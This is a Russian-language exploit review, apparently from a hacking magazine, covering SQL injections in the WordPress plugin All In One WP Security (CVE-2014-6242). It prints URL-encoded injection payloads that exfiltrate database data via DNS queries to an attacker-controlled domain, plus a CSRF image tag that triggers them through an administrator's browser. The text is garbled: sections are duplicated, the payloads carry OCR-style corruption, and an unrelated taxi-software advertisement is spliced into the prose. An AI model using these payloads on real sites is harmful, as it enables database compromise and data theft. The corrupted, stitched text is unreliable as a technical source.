Обзор эксплойтов: анализ свеженьких уязвимостей
Содержание:
1. SQL-инъекции в Wordpress-плагине (Вы читаете данный раздел);
2. Переполнение буфера в Teamspeak Client v3.0.14;
3. Нашумевший Shellshock.
Вся информация предоставлена исключительно в ознакомительных целях. Ни сайт, ни автор не несут ответственности за любой возможный вред,причиненный материалами данной статьи.
В предыдущий месяц интернет, не побоюсь этого слова, взорвала новость с уязвимостью Shellshock. Ей подвержены многие устройства, использующие bash. И по слухам, с помощью этой уязвимости, возможно, были скомпрометированы Yahoo-серверы. Поэтому рассмотрим ее с примерами использования и еще несколькими менее популярными уязвимостями.
Для защиты сайтов мы часто используем различные third-party тулзы и плагины, например модные нынче WAF. Но иногда это добавляет, помимо защиты, еще и новый вектор атаки. Сегодняшний обзор мы и начнем с уязвимости в таком плагине для популярной платформы WordPress — All In One WP Security. Исследователями из компании High-Tech Bridge SA были найдены не простые уязвимости, а SQL-инъекции, которые без проблем позволяют скомпрометировать базу данных сайта. Правда, есть ограничения: для воспроизведения атаки требуются права администратора. Но мы можем обойти это, используя атаки CSRF или DNS Exfiltration. О последней рассказывал Мирослав Штам- пар (Miroslav Stampar) с примером использования в своей программе sqlmap на PHDays 2012. Видео доклада есть в открытом доступе (bit.ly/1t0auAN). Перейдем к самим ошибкам и сразу эксплойтам для них.
Wordpress одна из самых перспективных и многострадальных открытых CMS, которая постоянно «штопается» разработчиками, но раз за разом хакеры находят в ней новые дыры. Впрочем, для такой системы подобное не стольк критично. Гораздо больший вред может принести «дырявое» корпоративное ПО, при взломе которого злоумышленник может натворить таких дел, что компании будет в пору сливаться с рынка оказываемый ей услуг. Так что я рекомендую Вам обращать внимание в первую очередь на такие качественные проекты как http://z-taxi.ru (http://z-taxi.ru) ("ЗЕБРА" для автоматизация такси-бизнеса), в которых изначально продумана мощная система безопасности.
EXPLOIT
Первая инъекция находится в GET-параметре orderby. Из-за некорректной обработки этой переменной скрипт /wp-admin/admin. php позволяет провести инъекцию произвольного SQL-кода. Пример атаки на сервер с помощью технологии DNS Exfiltration. Ее суть — отправить DNS-запрос к серверу, который находится под управлением атакующего, и потребовать IP-адрес для результата выполнения. Например, выполним такой код на тестовом сервере:
После выполнения появится запрос к 5.1.70-community-log.attacken.com.
Вторая уязвимость находится в параметре order. Для нее эксплойт будет похожим, но с небольшим изменением. DNS Exfiltration:
Рассмотрим также CSRF-вариант для одной изуязвимостей. Создаем HTML-страницу со следующим «изображением» и просим администратора ресурса зайти на наш сайт:
TARGETS
All In One WP Security Plugin <= 3.8.2.
SOLUTION
Есть исправление от производителя.
1.
2. Переполнение буфера в Teamspeak Client v3.0.14;
3. Нашумевший Shellshock.
Вся информация предоставлена исключительно в ознакомительных целях. Ни сайт, ни автор не несут ответственности за любой возможный вред,причиненный материалами данной статьи.
В предыдущий месяц интернет, не побоюсь этого слова, взорвала новость с уязвимостью Shellshock. Ей подвержены многие устройства, использующие bash. И по слухам, с помощью этой уязвимости, возможно, были скомпрометированы Yahoo-серверы. Поэтому рассмотрим ее с примерами использования и еще несколькими менее популярными уязвимостями.
SQL-инъекции в Wordpress-плагине
CVSSv2: 6.5 (AV:N/AC:L/Au:S/C:P/l:P/A:P)
Дата релиза: 3 сентября 2014 года
Автор: High-Tech Bridge SA
CVE: 2014-6242
Дата релиза: 3 сентября 2014 года
Автор: High-Tech Bridge SA
CVE: 2014-6242
Для защиты сайтов мы часто используем различные third-party тулзы и плагины, например модные нынче WAF. Но иногда это добавляет, помимо защиты, еще и новый вектор атаки. Сегодняшний обзор мы и начнем с уязвимости в таком плагине для популярной платформы WordPress — All In One WP Security. Исследователями из компании High-Tech Bridge SA были найдены не простые уязвимости, а SQL-инъекции, которые без проблем позволяют скомпрометировать базу данных сайта. Правда, есть ограничения: для воспроизведения атаки требуются права администратора. Но мы можем обойти это, используя атаки CSRF или DNS Exfiltration. О последней рассказывал Мирослав Штам- пар (Miroslav Stampar) с примером использования в своей программе sqlmap на PHDays 2012. Видео доклада есть в открытом доступе (bit.ly/1t0auAN). Перейдем к самим ошибкам и сразу эксплойтам для них.
Wordpress одна из самых перспективных и многострадальных открытых CMS, которая постоянно «штопается» разработчиками, но раз за разом хакеры находят в ней новые дыры. Впрочем, для такой системы подобное не стольк критично. Гораздо больший вред может принести «дырявое» корпоративное ПО, при взломе которого злоумышленник может натворить таких дел, что компании будет в пору сливаться с рынка оказываемый ей услуг. Так что я рекомендую Вам обращать внимание в первую очередь на такие качественные проекты как http://z-taxi.ru (http://z-taxi.ru) ("ЗЕБРА" для автоматизация такси-бизнеса), в которых изначально продумана мощная система безопасности.
EXPLOIT
Первая инъекция находится в GET-параметре orderby. Из-за некорректной обработки этой переменной скрипт /wp-admin/admin. php позволяет провести инъекцию произвольного SQL-кода. Пример атаки на сервер с помощью технологии DNS Exfiltration. Ее суть — отправить DNS-запрос к серверу, который находится под управлением атакующего, и потребовать IP-адрес для результата выполнения. Например, выполним такой код на тестовом сервере:
http://[ host ] /wp-admin/admin. php ?page=aiowpsec&tab=tabl&orderby=%28
select%201oad_file%28CONCAT%28CHAR%2892%29,CHAR%2892%29,%28select%20
version%28%29%29jCHAR%2846%29JCHAR%2897%29JCHAR%28116%29,CHAR%28116%29,
CHAR%2897%29,CHAR%2899%29,CHAR%28107%29,CHAR%28101%29,CHAR%28114%29, CH
AR%2846%29j CHAR%2899%29, CHAR%28111%29, CHAR%28109%29, CHAR%2892%29,
CHAR%28102%29,CHAR%28111%29,CHAR%28111%29,CHAR%2898%29,CHAR%2897%29,
CHAR%28114%29%29%29%29
select%201oad_file%28CONCAT%28CHAR%2892%29,CHAR%2892%29,%28select%20
version%28%29%29jCHAR%2846%29JCHAR%2897%29JCHAR%28116%29,CHAR%28116%29,
CHAR%2897%29,CHAR%2899%29,CHAR%28107%29,CHAR%28101%29,CHAR%28114%29, CH
AR%2846%29j CHAR%2899%29, CHAR%28111%29, CHAR%28109%29, CHAR%2892%29,
CHAR%28102%29,CHAR%28111%29,CHAR%28111%29,CHAR%2898%29,CHAR%2897%29,
CHAR%28114%29%29%29%29
После выполнения появится запрос к 5.1.70-community-log.attacken.com.
Вторая уязвимость находится в параметре order. Для нее эксплойт будет похожим, но с небольшим изменением. DNS Exfiltration:
http://[host]/wp-admin/admin. php?page=aiowpsec&tab=tabl&orderby=%28
select%201oad_file%28CONCAT%28CHAR%2892%29, CHAR%2892%29,%28select%20
version%28%29%29, CHAR%2846%29, CHAR%2897%29, CHAR%28116%29,CHAR%28116%29,
CHAR%2897%29j CHAR%2899%29, CHAR%28107%29 j CHAR%28101%29, CHAR%28114%29j
CHAR%2846%29,CHAR%2899%29,CHAR%28111%29,CHAR%28109%29,CHAR%2892%29, CHAR%28102%29,CHAR%28111%29,CHAR%28111%29,CHAR%2898%29,CHAR%2897%29,
CHAR%28114%29%29%29%29
select%201oad_file%28CONCAT%28CHAR%2892%29, CHAR%2892%29,%28select%20
version%28%29%29, CHAR%2846%29, CHAR%2897%29, CHAR%28116%29,CHAR%28116%29,
CHAR%2897%29j CHAR%2899%29, CHAR%28107%29 j CHAR%28101%29, CHAR%28114%29j
CHAR%2846%29,CHAR%2899%29,CHAR%28111%29,CHAR%28109%29,CHAR%2892%29, CHAR%28102%29,CHAR%28111%29,CHAR%28111%29,CHAR%2898%29,CHAR%2897%29,
CHAR%28114%29%29%29%29
Рассмотрим также CSRF-вариант для одной изуязвимостей. Создаем HTML-страницу со следующим «изображением» и просим администратора ресурса зайти на наш сайт:
<img sгс="httр://[host]/wp-admin/admin.php?page=aiowpsec&tab=tab1&
order by=%28select%201oad_file%28CONCAT%28CHAR%2892%29, СНАR%2892%29,
%28select%20version%28%29%29,CHAR%2846%29,CHAR%2897%29,CHAR%28116%29,
CHAR%28116%29, CHAR%2897%29, CHAR%2899%29, CHAR%28107%29, CHAR%28101%29,
CHAR%28114%29, CHAR%2846%29, CHAR%2899%29, CHAR%28111%29, CHAR%28109%29, CHAR%2892%29,CHAR%28102%29,CHAR%28111%29, CHAR%28111%29, CHAR%2898%29,
CHAR%2897%29,CHAR%28114%29%29%29%29">TARGETS
All In One WP Security Plugin <= 3.8.2.
SOLUTION
Есть исправление от производителя.